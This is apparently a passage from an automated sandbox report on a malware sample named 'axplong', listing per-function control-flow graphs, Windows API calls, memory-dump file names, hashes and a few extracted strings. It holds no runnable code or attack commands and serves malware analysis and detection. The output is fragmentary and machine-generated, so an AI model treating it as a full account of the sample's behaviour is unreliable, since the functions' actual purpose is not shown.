                            • Instruction Fuzzy Hash: 1D41AF75960385ABDB24EFB6EC459AFBBF9EF98340B50442DF456D3610E730A924CB20
                            Function 002E6C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1435 2e6c99-2e6ca5 1436 2e6ca7-2e6cc3 call 2e7430 call 2e7443 call 2e6b8a 1435->1436 1437 2e6cc4-2e6ce8 call 2e4020 1435->1437 1443 2e6cea-2e6d04 call 2e7430 call 2e7443 call 2e6b8a 1437->1443 1444 2e6d06-2e6d28 CreateFileW 1437->1444 1467 2e6d72-2e6d76 1443->1467 1447 2e6d2a-2e6d2e call 2e6e01 1444->1447 1448 2e6d38-2e6d3f call 2e6d77 1444->1448 1453 2e6d33-2e6d36 1447->1453 1457 2e6d40-2e6d42 1448->1457 1453->1457 1459 2e6d64-2e6d67 1457->1459 1460 2e6d44-2e6d61 call 2e4020 1457->1460 1463 2e6d69-2e6d6f 1459->1463 1464 2e6d70 1459->1464 1460->1459 1463->1464 1464->1467
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0244536d2a62407776bf74cd7adfc90bbc11cc63997839ee1b250d787d5c369f
                            • Instruction ID: 1242d65ff2e5c73e039ae0cba7bbcb480f18fd2397d6bcda8f47d2b6394c99fb
                            • Opcode Fuzzy Hash: 0244536d2a62407776bf74cd7adfc90bbc11cc63997839ee1b250d787d5c369f
                            • Instruction Fuzzy Hash: E1212B329A12487AEB117F66AC45B9F37299F417B8F900310F9243B1D1D7706E219AA1
                            Function 002E6F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1469 2e6f71-2e6f87 1470 2e6f89-2e6f8d 1469->1470 1471 2e6f97-2e6fa7 1469->1471 1470->1471 1472 2e6f8f-2e6f95 1470->1472 1475 2e6fa9-2e6fbb SystemTimeToTzSpecificLocalTime 1471->1475 1476 2e6fe7-2e6fea 1471->1476 1473 2e6fec-2e6ff7 call 2ccf21 1472->1473 1475->1476 1478 2e6fbd-2e6fdd call 2e6ff8 1475->1478 1476->1473 1481 2e6fe2-2e6fe5 1478->1481 1481->1473
                            APIs
                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 002E6FB3
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$LocalSpecificSystem
                            • String ID:
                            • API String ID: 2574697306-0
                            • Opcode ID: 73783b9623eba90f2943cb310b7b738f16acfe16aec8704de86d0239c5852528
                            • Instruction ID: fb56490bff60818614612ba5d04b87acc175d1860d42a5b2977b4b256e40ff02
                            • Opcode Fuzzy Hash: 73783b9623eba90f2943cb310b7b738f16acfe16aec8704de86d0239c5852528
                            • Instruction Fuzzy Hash: E8114F7295020DAACB10DED2D944EDFBBBCAB18360F504266E516E6180E730EB54CB61
                            Function 002C6AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 5736060af7980c767d6ade376dfe76b253b58ed832c1c049e8b3a4e02a56cab8
                            • Instruction ID: 1bf88e36d7cb4d4419d1c491bad5166e9c245da652c5206e402580f26ada58ba
                            • Opcode Fuzzy Hash: 5736060af7980c767d6ade376dfe76b253b58ed832c1c049e8b3a4e02a56cab8
                            • Instruction Fuzzy Hash: FCF0F971E10514ABCB057B68DC07B9E7B79E70B764F80035CF811672D1DB345A204BD2
                            Function 04CB0369 Relevance: .1, Instructions: 57COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1523 4cb0369-4cb0376 1525 4cb0378-4cb03ab 1523->1525 1526 4cb03c1-4cb03ef 1523->1526 1531 4cb03b1-4cb03b8 1525->1531 1532 4cb03ac call 4cb03b9 1525->1532 1533 4cb03f6-4cb0442 1526->1533 1532->1531
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_4cb0000_axplong.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 770737910e09d109c5a7624152f8ecb9e513eceab66f4e65815845f920aaac8c
                            • Instruction ID: c6cf31e4003d867efcfe01ff497f3471a02ef87ae57ce77b46a4104b9bebaf3a
                            • Opcode Fuzzy Hash: 770737910e09d109c5a7624152f8ecb9e513eceab66f4e65815845f920aaac8c
                            • Instruction Fuzzy Hash: ABF096E735C310BE710155832718AF7662FE5C2630F70C426F483C6402FA956E0D38B1
                            Function 04CB03B9 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_4cb0000_axplong.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32c03c901a63f1d761cf05c5e6b0201156098b0794c0cdc40b3f41a1b672a4d4
                            • Instruction ID: 311aa408e1aac5585f3c1d722f038e3f675fcd91e65b646c7f75c834f437e674
                            • Opcode Fuzzy Hash: 32c03c901a63f1d761cf05c5e6b0201156098b0794c0cdc40b3f41a1b672a4d4
                            • Instruction Fuzzy Hash: 71E01AEB24C120AE704180833B68AFB972EE1C2231B34C837F887D1402E6895A4E3571
                            Function 04CB03D1 Relevance: .0, Instructions: 34COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_4cb0000_axplong.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 79a37b82975745259f5471491b9468d4d3b8a60f3ddb4a0b022ff3903adaa82d
                            • Instruction ID: 6f66b23f8ea514f241dbbf5bb4a10ef84942873db1007123a248350412cc864c
                            • Opcode Fuzzy Hash: 79a37b82975745259f5471491b9468d4d3b8a60f3ddb4a0b022ff3903adaa82d
                            • Instruction Fuzzy Hash: 32E0B6EB24C164AEA14281532B19AFA6B2EE4C2231B34C462F082D5407E6895A5E7972
                            Function 04CB03DD Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_4cb0000_axplong.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1302cf8257deb7c3462acad2a8283ae7e3f6f78071b8b59f0316cef07478aded
                            • Instruction ID: 9907f430edf71a85cbee620db8cad9a0d35477e898f63f68874e8521aac324e3
                            • Opcode Fuzzy Hash: 1302cf8257deb7c3462acad2a8283ae7e3f6f78071b8b59f0316cef07478aded
                            • Instruction Fuzzy Hash: 0BE0ECEB249014ADA04195537B189FAA73DE4C2334734C437F442D7403E6995B5E7971

                            Non-executed Functions

                            Function 002BE440 Relevance: 14.6, Strings: 11, Instructions: 878COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d41$fed3aa
                            • API String ID: 0-1572351859
                            • Opcode ID: 60987ed3c43b6ef349bbe478194cf588d0572cb335ea0db518c38c7b9c24a147
                            • Instruction ID: ed4a359b183aa374055775cac8d775301308f7b71e02734b66416781bf5c0a0e
                            • Opcode Fuzzy Hash: 60987ed3c43b6ef349bbe478194cf588d0572cb335ea0db518c38c7b9c24a147
                            • Instruction Fuzzy Hash: 44720570924248DBEF14EF68C949BDDBFB6AB05304F50829CE805673C2C7759A98CF92
                            Function 002F3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: e32e4cd19ec27a79b0b89221c3da5ec00b0efa445cd13859096d89eda5a74c58
                            • Instruction ID: 1aff3f509aa85dee59d6f0917baa7a5e0d1e73277655baaf3f0a5e9be00527c8
                            • Opcode Fuzzy Hash: e32e4cd19ec27a79b0b89221c3da5ec00b0efa445cd13859096d89eda5a74c58
                            • Instruction Fuzzy Hash: B7C22971E2462D8BDB25DE28DD407EAF3B9EB48384F1441EAD94DE7240E774AE918F40
                            Function 002F2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                            • Instruction ID: 6084d1705f2f2afc09b5893a608830756f05eb1214a4a8bc0b54b0d9a0ac1864
                            • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                            • Instruction Fuzzy Hash: 94F15D71E1021ADBDF14CFA8C8806AEF7B1FF49354F25826AD919AB344D730AE15CB90
                            Function 002CD312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B247E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: 'k,d+1$'k,d+1
                            • API String ID: 2659868963-3369981402
                            • Opcode ID: 89fce1ea59fe18c1db8b59d3c89f81203d3542b21f74a3292cd744fc338be645
                            • Instruction ID: b44de3aec6609fced87af0b83803e5b46e2bf45ea52a28f179908bdf541fea51
                            • Opcode Fuzzy Hash: 89fce1ea59fe18c1db8b59d3c89f81203d3542b21f74a3292cd744fc338be645
                            • Instruction Fuzzy Hash: AB5189B2E20606CBDB16CF59D881BAAB7F9FF48310F24866AD405EB254D7709960CF50
                            Function 002CCB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,002CCE82,?,?,?,?,002CCEB7,?,?,?,?,?,?,002CC42D,?,00000001), ref: 002CCB33
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FilePreciseSystem
                            • String ID:
                            • API String ID: 1802150274-0
                            • Opcode ID: 2cf0e28ebcfea305b8294476e693018bff6071078231e9ec719c4faf7a938215
                            • Instruction ID: 805dc3d66ab43abc53d8c00eefc0c319beddee371594e66e39e6d649165127d4
                            • Opcode Fuzzy Hash: 2cf0e28ebcfea305b8294476e693018bff6071078231e9ec719c4faf7a938215
                            • Instruction Fuzzy Hash: 09D0223252303CD3CA062FD0BC05EACBB0D8A04B18B984256E80D33120CE516C105BD0
                            Function 002E7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                            • Instruction ID: 52a80abeeb14b1af58f5d260799b931eaf14e241b2e5fb0283ea146b3a341b79
                            • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                            • Instruction Fuzzy Hash: 9051A8302FC6CA56DB388E3B88953BE679A9F43300FD80559D482C7A82DB519D349352
                            Function 002B4CF0 Relevance: .7, Instructions: 701COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2696f9cf99d7da95f535fa43a37144db77be026736458c9b25a16ca5a088edf
                            • Instruction ID: 4230764e4b4185060c40108e43144b370fba3b958701b3c57bf79fe2c59bfb5e
                            • Opcode Fuzzy Hash: d2696f9cf99d7da95f535fa43a37144db77be026736458c9b25a16ca5a088edf
                            • Instruction Fuzzy Hash: 39224EB3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                            Function 002F6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6578423f5c241e72c582e6e14e340fb18ca8ceecb2328b7973a34444ba5c53e7
